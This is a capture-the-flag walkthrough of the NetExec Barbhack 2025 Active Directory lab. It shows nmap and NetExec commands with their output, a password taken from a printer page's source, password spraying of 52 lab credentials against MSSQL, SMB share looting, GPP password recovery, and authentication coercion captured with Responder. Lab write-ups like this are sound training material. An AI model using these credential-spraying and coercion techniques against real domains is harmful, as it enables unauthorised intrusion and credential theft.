Members of the NetExec team created a small lab as a CTF for the Barbhack conference that took place in August 2025 in the South of France. There are four Windows servers on an Active Directory domain. I’ll find a leaked password on a printer webpage to get access to print jobs where I find initial passwords, some of which still work. I’ll use that to get into the domain, coercing an authentication that I can relay into RBCD to get a ticket at admin on the webserver. I’ll decrypt a saved password on that machine to get access to a new SMB share where I’ll find a GMSA credential in a file. That user can abuse impersonation in the MSSQL database to become sa, where I’ll abuse SeImpersonatePrivilege to get SYSTEM on the DB server. That server has constrained delegation over another, which I’ll abuse with RBCD to get there, and find a backup of ntds.dit. None of the hashes are still good, but a comment on a user provides the domain admin password and completely owns the domain.
DescriptionWelcome to the NetExec Active Directory Lab! This lab is designed to teach you how to exploit Active Directory (AD) environments using the powerful tool NetExec.
Originally featured in the Barbhack 2025 CTF, this lab is now available for free to everyone! In this lab, you'll explore how to use the powerful tool NetExec to efficiently compromise an Active Directory domain during an internal pentest.
The ultimate goal? Become Domain Administrator by following various attack paths!
Ahoy, matey! Time to conquer the Seven Seas and claim the PIRATES.BRB domain!
Background
Lab
The CTF starting documentation describes a lab with the domain PIRATES.BRB, with four servers:
BLACKPEARL (192.168.10.10) - Domain Controller
JOLLYROGER (192.168.10.11) - Web Application Server (Caddy on port 8080)
QUEENREV (192.168.10.12) - MSSQL Server
FLYINGDUTCHMAN (192.168.10.13) - Windows Server with NTDS backup
My setup is actually in the 10.2.10.0/24 IP range. My attack VM is 10.2.10.99.
It also gives an Attack Path Summary
Initial Enumeration - Identify servers and services
Web Application - Find credentials on the printer web interface
Flag 1 - User’s descriptions
Flag 2 - SMB share access
Flag 3 - Group Policy Preferences
Flag 4 - NTLMv1 relay to LDAP + SPN-less RBCD
Flag 5 - DPAPI for local account
Flag 6 - GMSA offline recovery + MSSQL impersonation
Flag 7 - MSSQL command execution + S4U2Self privilege escalation
Flag 8 - Kerberos Constrained Delegation without Protocol Transition
Flag 9 - NTDS backup forensics → Domain Admin
I’m not going to read that too closely, but it will provide guidance on where to look next should I get stuck.
netexec Setup
Default Workspace
I’m going to be using the NetExec workspaces feature for this lab. To start, I’ll drop into nxcdb and show there is currently only the default workspace:
oxdf@hacky$nxcdb
(Cmd)workspace list
[*] Enumerating Workspaces
default
I can check out the default workspace:
(Cmd)workspace default
nxcdb (default) >
Then I need to pick a protocol (only smb, mssql, and winrm are supported at this point). I’ll use winrm:
nxcdb (default) >proto winrm
nxcdb (default)(winrm) >help
Documented commands (type help <topic>):
========================================
clear_database creds exit export help hosts
Undocumented commands:
======================
back import
nxcdb (default)(winrm) >
This is important to know about, as if this database collects real credentials during some kind of legit engagement, I want to know to clean them out once I’m done.
Create Workspace
For this lab, I want a unique workspace, so I’ll create one:
Whatever is active when I exit here will collect information from netexec when it’s run.
Recon
Network
While the documentation gives a bit more information about the servers, I’m going to start with just the class C of 10.2.10.0/24. I’ll start with a simple ping sweep:
oxdf@hacky$for i in{1..254};do(ping -c 1 10.2.10.${i} | grep"bytes from" | grep-v"Unreachable" &);done;64 bytes from 10.2.10.10: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.11: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.12: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.13: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.99: icmp_seq=1 ttl=64 time=109 ms
64 bytes from 10.2.10.254: icmp_seq=1 ttl=63 time=109 ms
.99 is my VM, and .254 is out of scope for this challenge. I’ll focus on the four at .10 - .13.
netexec will find these same four hosts:
oxdf@hacky$netexec smb 10.2.10.0/24
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100%0:00:00
They are each Windows Server 2022. There’s a domain, pirates.brb. I’ll take this opportunity to generate hosts entries:
oxdf@hacky$ping -c 1 blackpearl.pirates.brb
PING BLACKPEARL.PIRATES.BRB (10.2.10.10) 56(84) bytes of data.
64 bytes from BLACKPEARL.PIRATES.BRB (10.2.10.10): icmp_seq=1 ttl=127 time=111 ms
--- BLACKPEARL.PIRATES.BRB ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 110.844/110.844/110.844/0.000 ms
BLACKPEARL
nmap
nmap finds 28 open TCP ports on BLACKPEARL:
oxdf@hacky$nmap -p---min-rate 10000 -vvv 10.2.10.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 02:23 UTC
...[snip]...
Nmap scan report for 10.2.10.10
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2026-01-25 02:23:58 UTC for 7s
Not shown: 65507 closed tcp ports (reset)
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
57020/tcp open unknown syn-ack ttl 127
57023/tcp open unknown syn-ack ttl 127
57024/tcp open unknown syn-ack ttl 127
57029/tcp open unknown syn-ack ttl 127
64388/tcp open unknown syn-ack ttl 127
64412/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.30 seconds
Raw packets sent: 68914 (3.032MB) | Rcvd: 65689 (2.628MB)
oxdf@hacky$nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV 10.2.10.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 02:25 UTC
Nmap scan report for 10.2.10.10
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-25 02:25:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PIRATES.BRB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PIRATES.BRB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: BLACKPEARL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: BLACKPEARL, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:aa:b0:9f (unknown)
| smb2-time:
| date: 2026-01-25T02:25:41
|_ start_date: N/A
|_clock-skew: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.78 seconds
The box shows many of the ports associated with a Windows Domain Controller. The domain is PIRATES.BRB, and the hostname is BLACKPEARL.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
nmap notes a clock skew of only 1 second, so I’m good to take actions that use Kerberos auth.
I could try to brute force usernames / passwords over Kerberos, but only come back to that if I get nothing on other hosts. When I find creds, I can connect BloodHound data and look to connect over WinRM.
SMB signing is disabled, which means this server would be vulnerable to a relay attack.
Web - TCP 8080
Visiting http://jollyroger.pirates.brb:8080/ shows the page for an HP LaserJet printer:
The Jobs tab has 50 jobs:
Some of these might be interesting to look at, but clicking on them says I don’t have sufficient access:
It does give a path to the document in /scan. If I try to visit /scan or /scan/doc_auto.pdf, it pops HTTP auth:
The Network tab can take Wi-Fi creds:
The Security tab is prefilled with the username admin and a password that’s hidden. If I look at the raw HTML, I’ll see that the value is present, “hplaserbarbhack”:
The Support tab has a form to request support:
QUEENREV
nmap
nmap finds 18 open TCP ports on QUEENREV:
oxdf@hacky$nmap -p--vvv--min-rate 10000 10.2.10.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 13:44 UTC
...[snip]...
Nmap scan report for 10.2.10.12
Host is up, received reset ttl 127 (0.11s latency).
Scanned at 2026-01-25 13:44:43 UTC for 8s
Not shown: 65517 closed tcp ports (reset)
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49796/tcp open unknown syn-ack ttl 127
62888/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.76 seconds
Raw packets sent: 70459 (3.100MB) | Rcvd: 65889 (2.636MB)
oxdf@hacky$nmap -p 135,139,445,1433,3389,5985,5986 -sCV 10.2.10.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 13:46 UTC
Nmap scan report for 10.2.10.12
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-01-25T13:46:47+00:00; +2s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-23T21:09:59
|_Not valid after: 2056-01-23T21:09:59
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: PIRATES
| NetBIOS_Domain_Name: PIRATES
| NetBIOS_Computer_Name: QUEENREV
| DNS_Domain_Name: PIRATES.BRB
| DNS_Computer_Name: QUEENREV.PIRATES.BRB
| DNS_Tree_Name: PIRATES.BRB
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-25T13:46:40+00:00
| ssl-cert: Subject: commonName=QUEENREV.PIRATES.BRB
| Not valid before: 2026-01-22T20:58:17
|_Not valid after: 2026-07-24T20:58:17
|_ssl-date: 2026-01-25T13:46:47+00:00; +2s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=WIN2022-SRV-X64
| Subject Alternative Name: DNS:WIN2022-SRV-X64, DNS:WIN2022-SRV-X64
| Not valid before: 2025-11-21T05:59:37
|_Not valid after: 2035-11-19T05:59:37
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-25T13:46:40
|_ start_date: N/A
|_nbstat: NetBIOS name: QUEENREV, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:4b:ad:20 (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.34 seconds
The box shows ports typically associated with a Windows Client / Server. NetBIOS confirms the hostname QUEENREV.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
MSSQL, RDP, and WinRM are all open should I find creds. There’s also SMB which could show something unauthenticated, but more likely I’ll need to come back once I have creds.
SMB - TCP 445
Just as with the other hosts, I’m not able to list SMB shares without valid creds here either:
SMB signing is disabled, which means this server would be vulnerable to a relay attack.
Initial Credentials
Access Print Jobs
On the JOLLYROGER web page I found the obfuscated admin password. Visiting /scan pops HTTP auth, and the creds work there, showing a page that lists the files:
There are 131 files here! There’s a .htaccess file, but it doesn’t match up with the behavior for /scan:
# Prevent directory listing
Options -Indexes# Deny access to all files by default
<Files "*">
Order allow,deny
Deny from all
</Files>
# Optional: Custom error page for forbidden access
ErrorDocument 403 "Access denied. Contact IT support for document access."# Optional: Redirect to main page instead of showing error# RedirectMatch 403 ^/scan/.*$ /index.html
Perhaps this page is reading from another directory, or maybe something else is configuring the access.
Based on the file names, the other files consist of:
67 PDFs (.pdf)
24 Word documents (.docx)
29 Excel workbooks (.xlsx)
10 PowerPoint presentations (.pptx)
However, the file sizes are all too small to be these document types. When sorted by size, all but one of the docs are less than 175 bytes:
Other than IT_Procedures.docx, the rest are too small to be the format indicated by their extensions. For example, Quality_Standards.docx:
The PDFs don’t open in the browser nicely because it tries to render them as PDFs, but the others open to show the text.
IT_Procedures.docx is also just text, but it’s much longer:
I’ll save a copy. There are initial creds for 52 users on the network:
I’ll run the same command with the other two sets of creds, which shows the same shares. The only difference is that barnacle has read and write access to the TREASURE_HUNT share:
\\BLACKPEARL\NETLOGON and \\BLACKPEARL\SYSVOL as a quick scan to see if there’s anything interesting as far as logon scripts.
TREASURE_HUNT
The TREASURE_HUNT share has a single file:
oxdf@hacky$smbclient //jollyroger.pirates.brb/TREASOR_HUNT -U'barnacle'-W pirates.brb --password='First927&^!'Try "help" to get a list of possible commands.
smb: \>ls . D 0 Sun Jan 25 14:52:52 2026
.. DHS 0 Sat Jan 24 21:24:11 2026
flag.txt A 138 Fri Jan 23 21:09:01 2026
65535487 blocks of size 4096. 61661631 blocks available
I’ll grab the flag:
smb: \>get flag.txt
getting file \flag.txt of size 138 as flag.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
It has Flag 2:
bien joué marin d'eau douce !
brb{2274c1b8630627b88818cb4b91f5d3ea}
Congratulations! You found the treasure in the TREASOR_HUNT share!
🏁 Flag 2brb{2274c1b8630627b88818cb4b91f5d3ea}
I can write files to the share:
smb: \>put hosts
putting file hosts as \hosts (0.6 kb/s) (average 0.6 kb/s)
smb: \>ls . D 0 Sun Jan 25 15:55:10 2026
.. DHS 0 Sat Jan 24 21:24:11 2026
flag.txt A 138 Fri Jan 23 21:09:01 2026
hosts A 212 Sun Jan 25 15:55:10 2026
65535487 blocks of size 4096. 61661631 blocks available
I can come back and poke at this a bit more if I have reason to believe that automated users may be visiting and perhaps I can coerce them using some kind of file preview, but that seems like a longer shot for now.
SYSVOL
I’ll check out the shares on the DC using the SpiderPlusnetexec module:
The number of files is small, so I’ll re-run SpiderPlus with -o DOWNLOAD_FLAG=True, which creates ~/.nxc/modules/nxc_spider_plus/10.2.10.10/ with the files.
The file most interesting is Group.xml, which is where Group Policy Preferences (GPP) are stored. This feature was introduced in Windows Server 2008 as a way to allow administrators to set passwords via Group Policy. The passwords are stored encrypted, but the static AES key leaked, which makes them very easy to decrypt.
The encrypted password for the ADSAdmin user is stored in the cpassword field:
I’ll start my local BloodHound-CE Docker and upload the collection. I’ll mark the three users I have creds for as owned, but there are no interesting permissions from these users. I won’t actually end up using this at all throughout the lab, other than as a quick reference to look up users and groups.
MSSQL
I’ll run the same brute force of credentials against MSSQL, and the same three account succeed:
oxdf@hacky$netexec mssql queenrev.pirates.brb -u usernames -p passwords --no-bruteforce--continue-on-successMSSQL 10.2.10.12 1433 QUEENREV [*] Windows Server 2022 Build 20348 (name:QUEENREV) (domain:PIRATES.BRB)
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\blackbeard:TempPass2024!@# (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\ruby:NewHire789$%^ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\jack:Welcome123!&* (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\anne:FirstLogin456#$ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\longjohn:Initial789@!% (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\calico:Setup321^&* (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\oneeye:Begin654$#@ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\sparrow:Start987!@# (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\cutlass:Access147*&^ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\hook:Login258%$# (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [+] PIRATES.BRB\morgan:Entry369@!*
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\flint:Password741!@# (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\silver:Temp852$%^ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\bones:New963!&* (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\compass:Init159#$% (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\cannon:First357@!* (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\galleon:Setup486^&$ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\kraken:Begin753*#@ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\treasure:Start642!%^ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\parrot:Access951$@# (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\pegleg:Login824&*! (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\rumrunner:Entry573#$% (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\seabiscuit:Pass416!@* (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\horizon:Temp792$^& (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\mack:New685!#% (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\seafox:Init348@$* (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [+] PIRATES.BRB\barnacle:First927&^!
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\corsair:Setup164$%# (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\madeye:Begin583*!@ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\sharktooth:Start739^&# (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\sable:Access295$!* (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\stormy:Login476#@% (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\ghost:Entry618!^& (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\reef:Pass857$*# (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\brine:Temp423@!% (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\captainmorgan:New694^&$ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\blacktail:Init715!#* (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\redbeard:First382$%@ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\ironhook:Setup549&!^ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\saltydog:Begin826#$* (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\pegasus:Start173!@% (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\rumcutter:Access497^&$ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\stormbreaker:Login635$!# (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [+] PIRATES.BRB\plankwalker:Entry284*@&
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\seadog:Pass916!%^ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\reefwalker:Temp548#$@ (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\crowsnest:New729&*! (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\stormcloud:Init367$^% (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\harpoon:First894!@# (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\cutthroat:Setup152%&* (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\lagoon:|oJgt5L>)5vX (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
MSSQL 10.2.10.12 1433 QUEENREV [-] PIRATES.BRB\captainsparrow:Start683^@& (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
I’ll run it again with --local-auth, but none of them work.
oxdf@hacky$mssqlclient.py pirates.brb/plankwalker:'Entry284*@&'@queenrev.pirates.brb -windows-authImpacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUEENREV\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(QUEENREV\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (PIRATES\plankwalker guest@master)>
In addition to some default databases, there’s one named SECRET_GOLD:
SQL (PIRATES\plankwalker guest@master)>SELECTnameFROMsys.databases;name
-----------
master
tempdb
model
msdb
SECRET_GOLD
None of the three users I have access as can access SECRET_GOLD:
SQL (PIRATES\plankwalker guest@master)>SELECT*FROMSECRET_GOLD.information_schema.tables;ERROR(QUEENREV\SQLEXPRESS): Line 1: The server principal "PIRATES\plankwalker" is not able to access the database "SECRET_GOLD" under the current security context.
xp_cmdshell is not enabled, and I’m not able to enable it:
SQL (PIRATES\plankwalker guest@master)>xp_cmdshellERROR(QUEENREV\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (PIRATES\plankwalker guest@master)>enable_xp_cmdshellERROR(QUEENREV\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(QUEENREV\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(QUEENREV\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(QUEENREV\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
I’ll check for impersonation and linked servers, but nothing here:
The DC have unconstrained delegation isn’t surprising. The QUEENREV$ computer account has constrained delegation without protocol transition over FLYINGDUTCHMAN. I’ll need that later.
Shell as Administrator on JOLLYROGER
Coerce POC
There are a handful of methods for coercing a Windows server to make an authentication attempt back to a host I control. netexec has the Coerce Plus module that makes it very easy to try a bunch of these methods at once. I’ll point it at each host, and without specifying a method, it will try all of them. I’ll start Responder on my host to capture any of the attempts (sudo responder -I eth0), and give netexec a run:
It is very common for this module to report false positives, as it shows success on all four hosts. At responder, there are attempts to authenticate from the JOLLYROGER$ machine account:
If I had 9TB of space to download the recently release NTLMv1 rainbow tables from Mandiant, I could check this hash against those. I could also check against rockyou.txt, but given that this is a machine account, it is almost certainly a completely random password.
